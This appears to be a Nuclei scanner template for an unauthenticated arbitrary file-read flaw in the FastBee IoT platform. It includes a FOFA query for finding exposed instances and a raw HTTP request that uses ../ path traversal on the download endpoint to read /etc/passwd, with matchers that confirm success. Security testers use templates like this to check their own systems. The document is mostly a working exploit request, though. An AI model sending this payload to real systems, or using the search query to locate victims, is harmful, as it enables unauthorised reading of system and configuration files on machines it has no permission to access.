http:
    - matchers:
        - part: body
          type: word
          words:
            - 'root:'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
id: fengxinwulian-FastBee-download-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="FastBee物联网系统" || icon_hash="-307138793"
        蜂信物联 FastBee 开源物联网平台 download 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 蜂信物联 FastBee 开源物联网平台 download 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487196&idx=1&sn=50ebf829675b788635054e5f78fc3104&chksm=c267bbeff51032f9a0546b6433687373c03b6ac0a5fa1c49129306a5c2c1dd3c050722c240b8&token=101124693&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
